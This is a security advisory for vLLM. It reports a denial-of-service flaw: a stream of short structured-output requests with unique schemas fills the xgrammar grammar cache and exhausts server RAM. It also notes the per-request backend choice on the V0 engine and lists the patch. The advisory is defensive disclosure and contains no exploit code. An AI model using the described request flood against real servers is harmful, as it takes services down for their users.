Headline
GHSA-hf3c-wxg2-49q9: vLLM vulnerable to Denial of Service by abusing xgrammar cache
Impact
This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3
The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.
A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system’s RAM.
Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the guided_decoding_backend
key of the extra_body
field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.
Patches
- https://github.com/vllm-project/vllm/pull/16283
Workarounds
There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.
References
- https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-389x-67px-mjg3
Impact
This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3
The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.
A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system’s RAM.
Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the guided_decoding_backend key of the extra_body field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.
Patches
- vllm-project/vllm#16283
Workarounds
There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.
References
- GHSA-389x-67px-mjg3
References
- GHSA-389x-67px-mjg3
- GHSA-hf3c-wxg2-49q9
- vllm-project/vllm#16283
- vllm-project/vllm@cb84e45